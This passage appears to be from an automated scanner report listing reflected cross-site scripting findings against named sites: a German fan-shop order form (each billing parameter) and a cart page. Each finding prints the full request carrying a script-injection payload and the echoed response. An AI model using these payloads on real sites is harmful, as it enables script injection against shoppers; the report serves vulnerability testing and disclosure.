Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:25:51 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="account_id" value="6e0c2\"><script>alert(1)</script>e1fa66e6668" style="width:100px;">
...[SNIP]...
5.91. http://www.manitu.de/shop/ [billc_birthdate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_birthdate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c905c"><script>alert(1)</script>e53c535973d was submitted in the billc_birthdate parameter. This input was echoed as c905c\"><script>alert(1)</script>e53c535973d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=c905c"><script>alert(1)</script>e53c535973d&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:08 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16972

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_birthdate" value="c905c\"><script>alert(1)</script>e53c535973d" style="width:150px;">
...[SNIP]...
5.92. http://www.manitu.de/shop/ [billc_city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2308d"><script>alert(1)</script>11be4decd10 was submitted in the billc_city parameter. This input was echoed as 2308d\"><script>alert(1)</script>11be4decd10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=2308d"><script>alert(1)</script>11be4decd10&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:01 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16981

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_city" value="2308d\"><script>alert(1)</script>11be4decd10" style="width:250px;">
...[SNIP]...
5.93. http://www.manitu.de/shop/ [billc_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18208"><script>alert(1)</script>e2e4d6cdcf4 was submitted in the billc_email parameter. This input was echoed as 18208\"><script>alert(1)</script>e2e4d6cdcf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=18208"><script>alert(1)</script>e2e4d6cdcf4&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:57 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17045

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_email" value="18208\"><script>alert(1)</script>e2e4d6cdcf4" style="width:300px;">
...[SNIP]...
5.94. http://www.manitu.de/shop/ [billc_fax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_fax request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ea4f"><script>alert(1)</script>4612d8d6ccd was submitted in the billc_fax parameter. This input was echoed as 1ea4f\"><script>alert(1)</script>4612d8d6ccd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=1ea4f"><script>alert(1)</script>4612d8d6ccd&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:44 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_fax" value="1ea4f\"><script>alert(1)</script>4612d8d6ccd" style="width:180px;">
...[SNIP]...
5.95. http://www.manitu.de/shop/ [billc_firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_firstname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6099"><script>alert(1)</script>2ec26a9320f was submitted in the billc_firstname parameter. This input was echoed as a6099\"><script>alert(1)</script>2ec26a9320f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=a6099"><script>alert(1)</script>2ec26a9320f&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:43 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16977

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_firstname" value="a6099\"><script>alert(1)</script>2ec26a9320f" style="width:150px;">
...[SNIP]...
5.96. http://www.manitu.de/shop/ [billc_lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_lastname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc427"><script>alert(1)</script>88472088dee was submitted in the billc_lastname parameter. This input was echoed as cc427\"><script>alert(1)</script>88472088dee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=cc427"><script>alert(1)</script>88472088dee&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:55 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16976

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_lastname" value="cc427\"><script>alert(1)</script>88472088dee" style="width:150px;">
...[SNIP]...
5.97. http://www.manitu.de/shop/ [billc_organization parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_organization request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e90c4"><script>alert(1)</script>4c422d990fd was submitted in the billc_organization parameter. This input was echoed as e90c4\"><script>alert(1)</script>4c422d990fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=e90c4"><script>alert(1)</script>4c422d990fd&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:04 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_organization" value="e90c4\"><script>alert(1)</script>4c422d990fd" style="width:300px;">
...[SNIP]...
5.98. http://www.manitu.de/shop/ [billc_phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb713"><script>alert(1)</script>9025fab3457 was submitted in the billc_phone parameter. This input was echoed as eb713\"><script>alert(1)</script>9025fab3457 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=eb713"><script>alert(1)</script>9025fab3457&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:30 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16971

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_phone" value="eb713\"><script>alert(1)</script>9025fab3457" style="width:180px;">
...[SNIP]...
5.99. http://www.manitu.de/shop/ [billc_street1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_street1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7112b"><script>alert(1)</script>9eef17d54b4 was submitted in the billc_street1 parameter. This input was echoed as 7112b\"><script>alert(1)</script>9eef17d54b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=7112b"><script>alert(1)</script>9eef17d54b4&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:22 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16972

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_street1" value="7112b\"><script>alert(1)</script>9eef17d54b4" style="width:300px;">
...[SNIP]...
5.100. http://www.manitu.de/shop/ [billc_street2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_street2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bf1b"><script>alert(1)</script>a77f499cb1c was submitted in the billc_street2 parameter. This input was echoed as 8bf1b\"><script>alert(1)</script>a77f499cb1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=8bf1b"><script>alert(1)</script>a77f499cb1c&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:35 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_street2" value="8bf1b\"><script>alert(1)</script>a77f499cb1c" style="width:300px;">
...[SNIP]...
5.101. http://www.manitu.de/shop/ [billc_title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4023"><script>alert(1)</script>7e7e69e7b9f was submitted in the billc_title parameter. This input was echoed as b4023\"><script>alert(1)</script>7e7e69e7b9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=b4023"><script>alert(1)</script>7e7e69e7b9f&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:29 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_title" value="b4023\"><script>alert(1)</script>7e7e69e7b9f" style="width:100px;">
...[SNIP]...
5.102. http://www.manitu.de/shop/ [billc_zipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_zipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f9a2"><script>alert(1)</script>9f71fef3960 was submitted in the billc_zipcode parameter. This input was echoed as 3f9a2\"><script>alert(1)</script>9f71fef3960 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=3f9a2"><script>alert(1)</script>9f71fef3960&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:48 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16981

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_zipcode" value="3f9a2\"><script>alert(1)</script>9f71fef3960" size="5" style="width:50px;">
...[SNIP]...
5.103. http://www.my-happyfeet.com/cart.asp [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The value of the mode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eabd5</script><script>alert(1)</script>7b31a895f05 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?mode=logineabd5</script><script>alert(1)</script>7b31a895f05&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001 HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:10:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 23932
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
